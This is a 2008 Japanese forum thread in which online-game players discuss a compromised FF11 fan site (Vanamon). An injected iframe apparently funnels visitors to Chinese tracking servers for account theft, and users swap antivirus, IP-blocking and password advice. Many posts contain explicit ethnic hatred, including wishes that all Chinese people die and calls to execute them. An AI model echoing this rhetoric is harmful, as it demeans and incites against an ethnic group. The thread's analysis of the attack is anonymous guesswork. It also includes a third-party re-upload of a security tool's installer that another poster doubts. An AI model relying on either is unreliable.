※■の自動返信システムは文章の特定の単語を拾って勝手に返してるだけで、こちらの質問から全く関係ない返事が返って来る事がある。

306 :既にその名前は使われています:2008/04/29(火) 07:53:21.51 ID:H/1dAO5p
>>302
ヴァナモンは個人サイトだから■eは何も関係がない、むしろ手出しが出来ない。
ヴァナモンの管理人が気がつかない限り対策される事はない。
ヴァナモンの管理人、ネ実見てないのかな?

307 :既にその名前は使われています:2008/04/29(火) 07:53:55.27 ID:U4251PCt
>>306
みてる
専用トリももってるな

308 :既にその名前は使われています:2008/04/29(火) 07:55:17.07 ID:WqEWJrQ5
>>295
じゃあこんなスレ見てないで、自分の頭で考えて対策しろよ?
ここでブラウザ変えた方がいいってアドバイスしてる人達は別に強制してないんだから、
シナの工作に見えるなら信じないでIE使ってりゃいい話。

どうなっても泣きつかないでね^^

309 :既にその名前は使われています:2008/04/29(火) 07:56:39.52 ID:ACWUhBku
>>289
ページ見たら全部<Ifreame〜と文字で見えてるだろ、解説ページであって
埋め込まれてねーよ。

310 :既にその名前は使われています:2008/04/29(火) 07:57:55.77 ID:XkyZsVru
>>289
前にNoScriptのテスト用に、自分のサイトでIFRAME使ったページ作って
気付いたんだけど、同一ドメインのページを、IFRAMEに設定すると
表示されるっぽい。

ドメインが一緒でディレクトリが違う、知らない人のWEBページが
IFRAMEとJavaScript不可の状態で表示できてたから、
設定は、あってるんじゃないのかな。


311 :既にその名前は使われています:2008/04/29(火) 08:01:39.56 ID:NCErVUn+
>>142
それ、malwareAlarm(.com)じゃね・・?

312 :既にその名前は使われています:2008/04/29(火) 08:01:46.27 ID:v2PDDYFE
>>299
パスワードわからんから落とせないな
日本のアップローダーだし
投稿日時とかDL回数からして関係ないっぽいが


313 :既にその名前は使われています:2008/04/29(火) 08:02:19.88 ID:kLse6GM8
1年前ぐらいに糞シナ人のパス抜きサイトを逆に乗っ取って完全に無害化して
ぽこたんAAで勝利宣言した伝説のハッカーの登場を待つしかないな・・・
誰か奴を呼んでくれ


314 :既にその名前は使われています:2008/04/29(火) 08:07:24.16 ID:dGWRi6Vr
IPとブラウザ情報収集するタイプのウィルスって
そんなに悪質なタイプではないんじゃない?
まあセキュリティの甘いPC見つけるための第一歩なだけで、
きっと2次的3次的攻撃が待ってるオチだろうけど。

315 :既にその名前は使われています:2008/04/29(火) 08:08:09.17 ID:zpTNVlZo
>>310
なるほどそんな仕様が
でも>>309みたいにちゃんと有効になってて気づかない人もいるんですね・・

316 :既にその名前は使われています:2008/04/29(火) 08:10:58.98 ID:NWYlKBWE
だからPS2でやれと言ったんだバカヤロー!
お前らの死は無駄にしないぞ。

317 :既にその名前は使われています:2008/04/29(火) 08:12:29.91 ID:KA50Ku9I
>>313
その話kwsk

カッコ良すぎるだろwwwwwwww

318 :既にその名前は使われています:2008/04/29(火) 08:15:26.13 ID:15O5I2YY
>>41>>63
おまえら垢ハック業者だろw
てか本気にする奴居たらどうすんだよ、ブルートフォース方式でレィ〜プだぞ?

>>313
中国政府の手先、蛇頭によって暗殺されたかも?w

319 :既にその名前は使われています:2008/04/29(火) 08:17:34.73 ID:kLse6GM8
>>317
HPを見ただけでIDパスが盗まれる中国の罠サイトの被害が広まった時があったんだけど
突然ネ実のスレにハッカーが光臨してあっさりとHPを乗っ取ったと報告w
皆がそのサイトを恐る恐る開いてみると・・・トップページにはぽこたんの姿がw

320 :既にその名前は使われています:2008/04/29(火) 08:17:56.72 ID:L70eDoY4
ヴァナモンの人、起きないかなぁ
休日だし無理っぽいかぁ



321 :既にその名前は使われています:2008/04/29(火) 08:18:59.26 ID:ACWUhBku
>>315
ソース検索したら説明文の方が最初に引っかかったから惑わされちまった。
確かに俺の間違いだわ、スマンカッタ

322 :既にその名前は使われています:2008/04/29(火) 08:19:09.74 ID:xhix5jXS
で踏んじゃったらどうすればいいわけ?
何か埋め込むにしても、場所は特定でしょ。
全部、スキャンする必要ないし、どこなわけ?憶測じゃなくて手順説明して

323 :既にその名前は使われています:2008/04/29(火) 08:21:14.04 ID:ew0Q5C/A
>>322
素人は総当たりしとけ

324 :既にその名前は使われています:2008/04/29(火) 08:21:24.62 ID:KA50Ku9I
>>319

KakkoeeeeeeeeeeeeeEEEEEEEEEEEEEEEEE

325 :既にその名前は使われています:2008/04/29(火) 08:23:08.78 ID:xhix5jXS
なんだ、ここ>>323みたいな素人だけしかいないのかw


326 :既にその名前は使われています:2008/04/29(火) 08:25:08.30 ID:KA50Ku9I
>>325
その通りだ、よく気づいたな。
だからさっさと他行け。

327 :既にその名前は使われています:2008/04/29(火) 08:25:34.76 ID:ew0Q5C/A
>>325
お前には教えてヤンネー
クソして寝ろw

328 :既にその名前は使われています:2008/04/29(火) 08:25:38.51 ID:GycrNQsP
おいおい起きてびっくりしたぜ。
マジでこれ緊急事態じゃねーの?


329 :既にその名前は使われています:2008/04/29(火) 08:30:47.37 ID:v2PDDYFE
旧日本軍はまじで正解だった
こんな国滅ぼして当然

330 :既にその名前は使われています:2008/04/29(火) 08:31:16.34 ID:qgZVizEj
この前ヴァナモンで敵のLVを調べた

GWだし特に出かける用事も無いからモリモリ遊ぶお♪

POLログイン。認証失敗。

あれ・・?(汗)

カスペルスキーオンラインスキャンを実行

シナ畜から大量のトロイをバックドアで仕込まれてる

ぽっくんのキャラがやばいお!

サポートセンター休み()笑い

さて、何十、何百人の被害者が今回は出るんだろうね。
でもこんなのに引っかかる奴ってFF11やってるPCでこれからも
ネット見るんだろうね!不思議!

331 :既にその名前は使われています:2008/04/29(火) 08:33:05.29 ID:VitHIrw8
ほんと中国人は人類のガンだな

332 :既にその名前は使われています:2008/04/29(火) 08:33:11.34 ID:eI36Cdes
昨日どころかここ最近ずっとスレイプニルで開きっぱなしなんだが…

プニル開いた瞬間に感染したとかある?

333 :既にその名前は使われています:2008/04/29(火) 08:34:30.40 ID:aY4TNtk2
ヴァナモン改ざん27日以降ってなると自分みたか非常に微妙な時期だな
とりあえずカスペはひっかからなかった

ピアガードいれつつパス変えて様子みま

334 :既にその名前は使われています:2008/04/29(火) 08:35:24.22 ID:vAJKWX/v
スレタイだけで騒いでる奴もいるようだが、そういう奴は>>1から読んでこい

335 :既にその名前は使われています:2008/04/29(火) 08:35:30.06 ID:vP3DtNs4
ヴァナモン見た後でも、パスワード変えれば大丈夫?
ウィルスソフトとか、自分では入れたことないからよくわからなくって…

336 :既にその名前は使われています:2008/04/29(火) 08:35:40.02 ID:qgZVizEj
>>332
ニルとか関係なくて、クッキー・Javaスクリプト・iframe使用可の
この3つでアウトw
後はシナ畜から君のPCにハッキングの挑戦が来るだけ。
ふぁいっ

337 :既にその名前は使われています:2008/04/29(火) 08:37:53.00 ID:AmYvAT1o
あーGWでセキュリティーセンター休みってのあるから狙ってくるのか

338 :既にその名前は使われています:2008/04/29(火) 08:38:01.71 ID:IMqKinCP
中国人って、他人がいやがることしかしないよな
マジで全員惨たらしく死ね、中国人

339 :既にその名前は使われています:2008/04/29(火) 08:38:33.29 ID:L70eDoY4
>>332 はむしろ好都合なので、左のフレームのプロパティとソースを開いて

・更新日時時刻はいつか
・iframe の埋め込みが存在するか

をチェックして欲しいかもしれない

左のフレームは、アクセスするたびに生成されるタイプなので、プロパティを
見るだけで最後に開いたのが何時なのかわかる

27日の午前0時より過去の更新時刻であれば、iframe があってもなくても
みんなにとってかなり有用な情報源になるよ

340 :既にその名前は使われています:2008/04/29(火) 08:40:27.54 ID:WrYdNaBg
注意喚起あげ

341 :既にその名前は使われています:2008/04/29(火) 08:42:10.15 ID:GqLN06cZ
そろそろFFReceipeもやヴぁいな

342 :既にその名前は使われています:2008/04/29(火) 08:45:40.41 ID:vAJKWX/v
>>335
現状では即ハックというわけでもなさそうだが、それをさておいても
君のPCは非常に不安

ひとまずカスペルスキーでググってオンラインスキャン
ウイルスに引っかかったら試用版で早急に削除
出来るなら重要データのバックアップをとってクリーンインストールを
おすすめする

343 :既にその名前は使われています:2008/04/29(火) 08:47:50.69 ID:qgZVizEj
1つ言えるのは、FC2サーバを乗っ取った時みたいに不特定多数のPCにウイルスを
送りつけるのが今回は目的じゃない。

ヴァナモンというFF11プレイヤーに取って非常に有用でありがたく使用者も多く
今現在FF11をやりながら、またはやってるPCで見てる奴が多いPCを
ピンポイントで狙ってるのが今回。

加えてゴールデンウィークを挟み長期休暇に入ってサポートセンターが
機能しなくなる今日がXデー。

>>341
そろそろ所か、元運営者がサイト丸売りして買ったのがRMT業者じゃん。
やヴァい所がFFrecipe自体が真っ黒。
見てる奴は裸で背中にレイプして下さいと張り紙して裏街道歩いてるようなもん。

344 :既にその名前は使われています:2008/04/29(火) 08:48:27.42 ID:Mh0w3bM1
PCの電源抜けは一生安全

345 :既にその名前は使われています:2008/04/29(火) 08:50:13.76 ID:vAJKWX/v
よほどお金にならなかったのかまたもと運営に管理戻ったけどなw>ffrecipe

最近は職人の庭使ってるな

346 :既にその名前は使われています:2008/04/29(火) 08:53:58.07 ID:N9gcZ5X3
カスペオンラインスキャンしか言えんのか?
具体性が無い。埋め込むと言ったら特定の場所

347 :既にその名前は使われています:2008/04/29(火) 08:54:57.69 ID:53qPxmiS
この犯罪国家をなんとかしてくれ


348 :既にその名前は使われています:2008/04/29(火) 08:57:10.05 ID:v2PDDYFE
シナw<小日本が中国を僻んで足を引っ張ってる。自作自演で北京五輪を妨害するな!

349 :既にその名前は使われています:2008/04/29(火) 08:57:23.66 ID:nlo+hOot
>345
元に戻ったっつーか、元管理人がRMT業者に入社じゃね

350 :既にその名前は使われています:2008/04/29(火) 09:00:30.43 ID:eI36Cdes
今会社で、FFやってるPC落としてあるんだ…
帰ったらインできませんとかなったら凹むわ(´・ω・`)

351 :既にその名前は使われています:2008/04/29(火) 09:02:00.89 ID:ZfQ6r9dN
>>345
庭もけっして安全ではないぜ。
今回は完全にFF11の垢狙ってきてるから
庭に限った事じゃないがFF11関連のサイト覗くなら
セキュリティーは万全にしておいた方がいい。

352 :既にその名前は使われています:2008/04/29(火) 09:02:50.39 ID:nlo+hOot
>350
PC落としてても関係ないから安心しろ
後から入ったほう優先だ

353 :既にその名前は使われています:2008/04/29(火) 09:04:02.38 ID:mrAFyLW4
>>352
先に入られてるっつー事は、ほぼ確実にパス変更されてる訳だが?

354 :既にその名前は使われています:2008/04/29(火) 09:04:09.46 ID:vP3DtNs4
>>342
ありがとう。とりあえずカスペルスキーというのをやってみることにする

355 :既にその名前は使われています:2008/04/29(火) 09:04:57.13 ID:NpskGfZw
>>350
社会人がFFとか。マジワロスw
しかも今日は祝日なのにw
ダメ人間だから、休日出勤させられるんだよw
こんな人間にはなりたくないなw

356 :既にその名前は使われています:2008/04/29(火) 09:04:59.85 ID:nEcyfdzW
日本だけじゃなく、全世界から嫌われる支那竹()笑

357 :既にその名前は使われています:2008/04/29(火) 09:05:32.62 ID:nlo+hOot
>353
だからPC立ち上げたままでもどっちにしろ奪われるから関係ねーってだけの話なw

358 :既にその名前は使われています:2008/04/29(火) 09:07:23.86 ID:efvHHwLk
>>355
休日でもサーバー管理したり、イベント運営したりとか仕事は腐るほどあるんだぜ?

359 :既にその名前は使われています:2008/04/29(火) 09:08:47.59 ID:S/5sdfd9
カスペスキャンは重要な部分だけでもいいかな?
もうすぐ仕事で出ないといけないんだ

360 :既にその名前は使われています:2008/04/29(火) 09:10:45.25 ID:Lqf3PDqM
>>355の世界では
休日は店は全部閉まってて交通機関も全部ストップし、電気も流れてないんだろうね

361 :既にその名前は使われています:2008/04/29(火) 09:11:11.12 ID:NpskGfZw
>>358
そうでしたねw
では、そういう底辺職にしかつけないような大人には、ならないように気をつけます^^
やはり休日はきちんと休める職場じゃないと、妻や子供がかわいそうですし

362 :既にその名前は使われています:2008/04/29(火) 09:12:27.40 ID:/HwP8HgU
まぁ、仕事中にこんなとこ見てる時点でどうかと思うがw

363 :既にその名前は使われています:2008/04/29(火) 09:12:30.56 ID:efvHHwLk
>>361
だいじょうぶwおまえさんなら365日休日の立派な職業につけるwwww

364 :既にその名前は使われています:2008/04/29(火) 09:13:34.99 ID:AmYvAT1o
>>361
相手するのめんどくさいからIDNG登録

365 :既にその名前は使われています:2008/04/29(火) 09:19:03.44 ID:qyy8+QoR
クソスレラッシュが凄い件w
あげ

366 :既にその名前は使われています:2008/04/29(火) 09:19:22.10 ID:d/Cl5Aih
皆に注意を促す意味でも、こうゆうスレはちゃんとしとくべきだと思うんだ。

つー訳で

何でも煽りゃいいと思ってる子供はスルーしましょうね。


367 :既にその名前は使われています:2008/04/29(火) 09:21:03.48 ID:LXJd3dM5
あげとこう。

368 :FREE TIBET:2008/04/29(火) 09:22:36.44 ID:KjnLi3K5
>>356
今回の聖火リレーで世界中の人間が再認識できたなw

369 :既にその名前は使われています:2008/04/29(火) 09:22:56.55 ID:vAJKWX/v
>>351
まあさすがに見るときは火狐+NoScriptだけどね

GWだからいろいろな人がいるな

370 :既にその名前は使われています:2008/04/29(火) 09:23:21.36 ID:ouZeCpsW
休日に朝から出勤してネ実を見ているかわいそうな人がいると聞いて飛んできました!

371 :既にその名前は使われています:2008/04/29(火) 09:25:37.62 ID:vAJKWX/v
飛んでくる奴の方がかわいそうな件について

372 :既にその名前は使われています:2008/04/29(火) 09:25:49.76 ID:Xp15kVxn
上の方でちらっと出てたゴブクラは結局大丈夫なの?
さすがにこえー回りにも注意喚起しとくわ

373 :既にその名前は使われています:2008/04/29(火) 09:26:00.04 ID:YDOjljHg
POL以外からパス変更ってできない?

374 :既にその名前は使われています:2008/04/29(火) 09:26:44.39 ID:VL6wB1R5
PG2入れようと思ったけど、日本語化ソフトウェアのサイトに繋がらん・・・orz

375 :既にその名前は使われています:2008/04/29(火) 09:28:23.74 ID:hlrs4Ueg
FF11辞めたら安全なんじゃね?

376 :既にその名前は使われています:2008/04/29(火) 09:30:37.70 ID:2+CfD7NC
つか、いまだにFF11をやっているとか、本気でワロスw

377 :既にその名前は使われています:2008/04/29(火) 09:32:50.36 ID:MtyjmLeM
あー米国辺りが本気出してこの国締め出してくれねーかなー。
賛成する国の方が確実多いと思うわ。まじで害にしかならん

378 :既にその名前は使われています:2008/04/29(火) 09:33:46.02 ID:P+JVKcFa
>>121
日本国内にいる奴は逮捕可能

379 :既にその名前は使われています:2008/04/29(火) 09:34:53.47 ID:2+CfD7NC
日本にいる中国人は全員犯罪者なんだから、全員逮捕して死刑にすれば良いんじゃないか?
中国人なんて、生きている価値ないんだし

380 :既にその名前は使われています:2008/04/29(火) 09:35:57.12 ID:vAJKWX/v
>>379
日本を中国同様にする気かおまえは、すこしは落ち着け


381 :既にその名前は使われています:2008/04/29(火) 09:41:23.08 ID:VL6wB1R5
簡単な英語だったから英語版のPG2いれた

382 :既にその名前は使われています:2008/04/29(火) 09:42:09.80 ID:5ItgVO3u
ヴァナモンはやばいなぁ・・・利用してる奴多いだろ

383 :既にその名前は使われています:2008/04/29(火) 09:46:46.45 ID:xtVtNL+d
日本語版配布サイトが落ちているようなので、勝手ながらpg2-050918-nt-jp.exeを
axfcに上げました。

DLパスは「pg2」

http://www11.axfc.net/uploader/20/so/He_95969.exe

自分も昨晩ヴァナ門エリア別ページを見ていたのでPG2のログを見たところ、9時15分の時点で
219.232.241.141:80へのブロック履歴がありました。各種対策はしていますが、念のために他PCから
パスワード変更。

384 :既にその名前は使われています:2008/04/29(火) 09:47:05.88 ID:a/93xZMr
これってパスワード毎回手打ちしていても抜かれるの?

385 :既にその名前は使われています:2008/04/29(火) 09:47:30.64 ID:AovPKs17
こういう事があるせいでPCでやれないわ・・・。
知識無いからブログやサイトが見れない!見にくい!

386 :既にその名前は使われています:2008/04/29(火) 09:50:20.59 ID:0r4Vw+/b
>>384
キーロガーとは違うだろうから多分大丈夫。


387 :既にその名前は使われています:2008/04/29(火) 09:51:01.39 ID:na4JU6Mw
スーパーハカー求む

388 :既にその名前は使われています:2008/04/29(火) 09:57:06.92 ID:HwkH/Z3X
SiteAdvisorのユーザコメントでだが、
2007年12月30日-05時38分29秒時点で踏み台認定されてる。
今回のもコメントしておいたがね。

389 :既にその名前は使われています:2008/04/29(火) 09:57:06.91 ID:8Q6RHo+H
ヴァナモン閉鎖するのかな?

390 :既にその名前は使われています:2008/04/29(火) 09:57:36.96 ID:P+JVKcFa
>>275
勝手にまとめんな
調査した範囲での話だろ
まだ、危険な地雷が埋め込まれている可能性は0ではない

391 :乙四類ブレード〆2008 ◆C7T.wkNVsU :2008/04/29(火) 09:58:00.03 ID:J6LzjlLO
メンバーパスワードってのをいつも手打ちで入れてるんだがこれでもだめか?

392 :既にその名前は使われています:2008/04/29(火) 09:58:03.88 ID:8aIVEtxk
俺もカスペルスキー入れてるんだけど
これだけじゃ効果ないのかな?

393 :既にその名前は使われています:2008/04/29(火) 09:58:37.48 ID:OrYeYIjV
自分でも調べてみたけど、 >>249 >>262 >>298 と同じだった。
>>298 に書いてある通り、今回は情報収集してるだけなのかな?
へんなバイナリを仕込んでこようとはしてないみたいだけど、どうだろう。

ほかにも調べたやついる?

394 :既にその名前は使われています:2008/04/29(火) 09:58:55.65 ID:70L3ESL/
特定の個人をとっつかまえたって言ってたのはなんだったの?
結局そいつだけの仕業じゃなかったってこと?

395 :既にその名前は使われています:2008/04/29(火) 10:01:00.57 ID:0r4Vw+/b
>>394
さすがにあほすぎるだろう。
そのこじんはFF11のサーバ自体をこうげきしていたやつだ。

396 :既にその名前は使われています:2008/04/29(火) 10:01:34.80 ID:8aIVEtxk
パスワードはnobuo

397 :既にその名前は使われています:2008/04/29(火) 10:01:37.36 ID:IC9s0DHn
>>383
ぱすぬかれた;;

398 :既にその名前は使われています:2008/04/29(火) 10:02:17.30 ID:P+JVKcFa
>>341
そこは元から管理がRMT業者

399 :乙四類ブレード〆2008 ◆C7T.wkNVsU :2008/04/29(火) 10:02:59.18 ID:J6LzjlLO
>>396
なんでばらすの;;

400 :既にその名前は使われています:2008/04/29(火) 10:03:38.04 ID:WcBUBXPW
カスペルスキーのお勧めの設定おせえて><

401 :既にその名前は使われています:2008/04/29(火) 10:03:44.59 ID:P+JVKcFa
PG2本家の英語版でいいだろうに

簡単な英語すら読めない奴はあきらめろ

402 :既にその名前は使われています:2008/04/29(火) 10:10:59.86 ID:1RG0GEFM
注意喚起age

403 :既にその名前は使われています:2008/04/29(火) 10:11:14.71 ID:1RG0GEFM
おいおい俺下げてるよ

404 :既にその名前は使われています:2008/04/29(火) 10:13:37.48 ID:tzgOkN4X
PG2にリストを手動で追加、のやり方がわかりません(´Д⊂

405 :既にその名前は使われています:2008/04/29(火) 10:16:52.68 ID:lvAZxCXr
リスト管理→追加→ファイル場所の指定orURL指定して適当な題名付けるだけだろ(´・ω・)

406 :既にその名前は使われています:2008/04/29(火) 10:19:27.69 ID:xtVtNL+d
>>404
せめてそれぐらいはリネージュ資料室さん読んで頑張ってくれ。

http://lineage.paix.jp/guide/security/basic-ipfilter.html#PG2


407 :既にその名前は使われています:2008/04/29(火) 10:21:01.35 ID:qb9Da6IU
>>404
パパやママに手伝ってもらってね

408 :既にその名前は使われています:2008/04/29(火) 10:22:28.21 ID:2+CfD7NC
チャンコロは生きるな

409 :既にその名前は使われています:2008/04/29(火) 10:27:11.12 ID:tzgOkN4X
IP範囲入力せよ、みたいになるんだけど
cnzz.comって名前つけてIP空欄じゃだめだよね
cnzz.comのIPどうやってわかるんですか(´Д⊂

410 :既にその名前は使われています:2008/04/29(火) 10:29:25.36 ID:WcBUBXPW
yabe
ヴァナモン見てからカスペ入れて
再起動してたら起動時Checking file system on C
とか出やがる
シャレにならんぜ

411 :既にその名前は使われています:2008/04/29(火) 10:29:39.43 ID:zAXIO//Y
被害報告ってあった?

412 :既にその名前は使われています:2008/04/29(火) 10:30:14.15 ID:lvAZxCXr
ドメイン名しかわからないならhostsでも書き換えておけよ(´・ω・)

413 :既にその名前は使われています:2008/04/29(火) 10:31:11.17 ID:PajA1qss
ヴァナモンてブログの時もわざとらしく対応遅かったけど、なんか怪しくないか?

414 :既にその名前は使われています:2008/04/29(火) 10:31:39.71 ID:fpfRw6PT
今回のウィルス対策ソフトの結果はどうなの?
どれも発見できず?

415 :既にその名前は使われています:2008/04/29(火) 10:33:39.77 ID:FRsu1WeZ
ヴァナモンってナニモン?

416 :既にその名前は使われています:2008/04/29(火) 10:33:57.96 ID:EA4MW4ZU
383があやしすぎる、、、

417 :既にその名前は使われています:2008/04/29(火) 10:35:48.61 ID:tJSRB5j8
>>413
誰も彼も常時ここに張り付いてるワケじゃない。
前回の業者大暴れの時に禿ガル出動やここで複数スレ立ったのに、今だ対策して
ない連中がおるように何事もずれはある。

418 :既にその名前は使われています:2008/04/29(火) 10:39:33.69 ID:WcBUBXPW
中国のIPから二回攻撃のログでてるは

419 :既にその名前は使われています:2008/04/29(火) 10:40:18.46 ID:CzLurdKq
>>409
例えばIPひろば ttp://www.iphiroba.jp/index.php とかドメイン/IPアドレス【whois情報検索】 ttp://www.cman.jp/network/support/ip.html
を使うがよいさー

420 :既にその名前は使われています:2008/04/29(火) 10:43:17.83 ID:xCNbQuXc
FFXIAH見てたら急にダイアログ出て何かインストールしろって出た。
スクロールしようとしてうっかり広告踏んだのかもしれんが気をつけたほうがいい。
ボックスは×押して消したがavastは反応なかった。

421 :既にその名前は使われています:2008/04/29(火) 10:53:55.85 ID:U4251PCt
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/
http://fhp.jp/tfm/

422 :既にその名前は使われています:2008/04/29(火) 10:55:48.51 ID:18lv04K1
>>224
ウィンが穴?
ウィンの場合は穴ではなくカギもドアも付いてないんだよ。


423 :既にその名前は使われています:2008/04/29(火) 10:56:38.70 ID:OqePFS4f
>>280
おはよう

PG2の日本語版配布サイトたしかに繋がらないの確認


424 :既にその名前は使われています:2008/04/29(火) 10:57:20.36 ID:7Ya3MO4T
>>361
cao ni ma

425 :既にその名前は使われています:2008/04/29(火) 10:59:32.78 ID:CRYGZmDd
>>420
その×がインストールボタンだったりして・・・w

426 :既にその名前は使われています:2008/04/29(火) 11:03:34.67 ID:7Ya3MO4T
>>420
FFXIAHもiframeカットしとけば、広告ほとんど表示されないよ
オミトロンでifameフィルター入れてる

427 :既にその名前は使われています:2008/04/29(火) 11:05:35.92 ID:0lkYXLE6
ウイルスバスターってどうなんだろうか。
あまり報告を聞かないからインストールしてても不安…。

428 :既にその名前は使われています:2008/04/29(火) 11:07:47.56 ID:PCWMZEWU
天安門事件とか法輪功とかそういう単語をいれておくと中国自慢のインターネット検閲金盾にひっかかり
中国共産党に目をつけられて、垢ハック業者が自国で刑務所行きw

429 :既にその名前は使われています:2008/04/29(火) 11:08:32.23 ID:2teil2Pm
>>63
スペル間違ってるよ
×Tienanmen Massacre
〇Tiananmen Massacre

430 :既にその名前は使われています:2008/04/29(火) 11:16:33.35 ID:QICTtHxo
これノートンインターネットセキュリティ2008入れてて更新毎日してても危険なの?


431 :既にその名前は使われています:2008/04/29(火) 11:20:14.71 ID:n/voeW56
>>430 ウイルス対策ソフトいれてるから絶対大丈夫ってわけではないのは素人の俺でもわかるw
罠サイトを把握したらどんな対策しててもいかないのが一番じゃない?普通に考えたらw

432 :既にその名前は使われています:2008/04/29(火) 11:20:36.04 ID:zMfsmopf
まぁ無理でしょうね

433 :既にその名前は使われています:2008/04/29(火) 11:22:31.41 ID:rLESaAEp
>>428
あの技術でアングラサイト取り締まっていりゃいいのに。
ホント技術の無駄遣いだよな

434 :既にその名前は使われています:2008/04/29(火) 11:23:49.28 ID:KjnLi3K5
>>430
ヒント:ゼロデイアタック

435 :262:2008/04/29(火) 11:24:04.26 ID:XkyZsVru
.>>393
> へんなバイナリを仕込んでこようとはしてないみたいだけど、どうだろう。

IMGタグでサーバへファイル要求してるけど、サーバからのレスポンスは、
[ Content-Type: text/html ]で、トロイ本体等を落とさせるHTMLなんかだと思う。
ついこの間、IMGタグで要求させて、EXEを落とさせるHTMLを返すタイプを
確認したから、今回のも同じタイプなんじゃないかと思う。

今回のは、IMGタグ要求時のパラメータ設定するのが面倒だったので、
実際に確認してないけど、ちゃんとパラメータ設定すれば、怪しげなものが
返ってくるんじゃないかな。


436 :既にその名前は使われています:2008/04/29(火) 11:24:27.09 ID:tah9eTj6
>>430
ノートン先生入れててもハック喰らった俺が言ってやる
危険w
pg2とかで自衛しとけ。俺みたいになるぞ

437 :既にその名前は使われています:2008/04/29(火) 11:30:09.18 ID:OrYeYIjV
>>435
いや、IMGタグをつかっての、2度目のリクエストで返ってくるものも確認したんだけど、
うん、 text/html だった。それが、 数バイトのたんなる文字列だったんだよー

とおもったけど、もう1回確認してくる。

438 :既にその名前は使われています:2008/04/29(火) 11:30:40.86 ID:/EwYiIz/
aguse Gateway通してFFXI関連サイトを見るようにするほうがいいね
ttp://gw.aguse.jp/   ←これね、これ使うとリンク先が危険かどうかを
             サイトが判断した基準で色の違う矢印が出る
ttp://www.aguse.jp/   ←こっちはプロバイダとかの危険判定できる感じ

ここ見ている人には当たり前の知識かもしれないけど一応書いておきます
こういうところ見るようになってPCのセキュリティ関係の知識向上したのは
良かったと思うけどいい加減ウンザリですね。

439 :既にその名前は使われています:2008/04/29(火) 11:32:01.23 ID:OqePFS4f
やることをちゃんとしれば、そうそう簡単には感染しないはずなんだが
こういうところを見ていると、何もしてないのいるんだなと

ブラウザの設定が〜とかじゃなく、ウィンドウズアップデートしてないとか


440 :既にその名前は使われています:2008/04/29(火) 11:34:04.51 ID:qEehAqbo
やることしてない人の方が多いよ。WindowsUpdateしてない人とか結構いるだろ。

441 :既にその名前は使われています:2008/04/29(火) 11:34:46.05 ID:XkyZsVru
>>437
ちゃんと、パラメータ設定しても、そうだったなら、
自分の思い過ごしかも。

442 :既にその名前は使われています:2008/04/29(火) 11:34:46.59 ID:kzjhWcCh
>>438
ほんとだよな セキュリティなんてそもそも悪さする奴らがいなければ必要ないってのに。
つーかそんな連中に稼ぎの場を提供してるって自覚無いのかね■は。わかっててわざと穴開けてんのかね。

ところで、ヴァナ内でフレにも注意喚起してるよな?

443 :既にその名前は使われています:2008/04/29(火) 11:39:37.66 ID:k8w4gwSM
>>410
馬鹿かwお前はw
ウィルス検索ソフト入れたからだろw
最初にOS立ち上げる前に検索する機能が動いてるだけだろwwwwwwww

シャレにならんぜw

444 :既にその名前は使われています:2008/04/29(火) 11:39:57.28 ID:unzBsdkq
いまヴァナモン見に行ったら@niftyに飛ばされたんだが
これは何のせい?


445 :既にその名前は使われています:2008/04/29(火) 11:40:55.87 ID:W25uR43K
>>437
Power by Cnzz
って書いてあるだけだったけど、同じく引数は無視w

446 :既にその名前は使われています:2008/04/29(火) 11:41:30.06 ID:lvAZxCXr
いくらなんでもパスとられるのは■のせいじゃないだろ・・・
POLの脆弱性を利用してパスとられるのならわかるが
RMTが横行してるのは■のせいとも言えるけどなーw

こんな程度の物に引っかかる程度のセキュリティじゃFF11よりもっと大事な情報とられる可能性もあるんだからな
会社の情報流出させてニュースにはなりたくないだろ?
ニートは知らん

447 :既にその名前は使われています:2008/04/29(火) 11:44:44.65 ID:kzjhWcCh
>>446
POLもまぁまずいっちゃまずいけどな 保存してなくてもクライアント側にIDとパスの情報あるし。
鯖管理なら注意するのはとりあえずキーロガーに絞れるんだが。
つってもRMT助長させてるのは確実なんだし、犯罪行為に及ぶような連中食わしとくのはダメだろ・・・

448 :既にその名前は使われています:2008/04/29(火) 11:50:33.53 ID:tJSRB5j8
■側も他のネトゲが被害受けてるのを見てるだけだからね、winで動く以上同じ
被害を受けるのは確実なのにそれに対する備えすら無い。

POLのIDやパスがほぼ生で見れるからヤバイってのはPC版発売後各自がツール
作り始めてから指摘されてたし、現状もそのまま。


449 :既にその名前は使われています:2008/04/29(火) 11:54:51.04 ID:VVoV0fQs
>>440
WindowsUpdateなんか自働で更新されるんだが、みんなは手動なのか?

450 :既にその名前は使われています:2008/04/29(火) 11:56:05.02 ID:z/2uxOyX
ヴァナモンまたっすか
裏の敵の名前一覧が便利で使ってたんだけど…
どこか他にいいところないかな?

451 :既にその名前は使われています:2008/04/29(火) 11:56:40.17 ID:kzjhWcCh
何から何までクライアント依存だからフィールドでジョブチェンとかできたんだよな確か
セキュリティの甘いPCユーザ責めるのもいいけど、POL自体穴の多いソフトって事ももっと理解されるべきだよなー

452 :既にその名前は使われています:2008/04/29(火) 11:56:41.91 ID:FB24rXcm
あぐる


453 :既にその名前は使われています:2008/04/29(火) 11:57:07.02 ID:DiUp5gyG
最近 FF系のページは VMware上のLinuxから Firefoxでしか見てないなw

なんつーか。完璧な自衛手段ってこれしかねー気がしてきた。

ウィルスバスター入れてる程度じゃ完全じゃねーし。

454 :既にその名前は使われています:2008/04/29(火) 11:57:39.21 ID:QICTtHxo
半自動にしてる
更新内容の通知だけで、ダウン・インストールは選択出来るようにしてる。
ま99%全部導入




455 :既にその名前は使われています:2008/04/29(火) 11:57:55.45 ID:OrYeYIjV
>>441 >>445
確認してみた。
2回目のリクエストは、222.77.xxx.x (略) stat.htm へのリクエストだよね?
User-Agent を IE7 のやつにして、 Referer も、罠ページの (略).com/top.htm
( top.html じゃなくて、 top.htm が罠 ) にしてやってみた。
stat.htm へのパラメータもちゃんとわたしてみた。

でもかえってきたのは、長さ13バイトの text/html だった。

やっぱり、情報収集してるだけなのかな? よくわからん


456 :既にその名前は使われています:2008/04/29(火) 11:58:43.37 ID:WrYdNaBg
ルーターハックもある時代に
完璧な自衛手段があるわけない。

457 :454:2008/04/29(火) 11:59:06.47 ID:QICTtHxo
>>449
さんへのレスでした(つд・)

458 :既にその名前は使われています:2008/04/29(火) 12:01:03.61 ID:WcBUBXPW
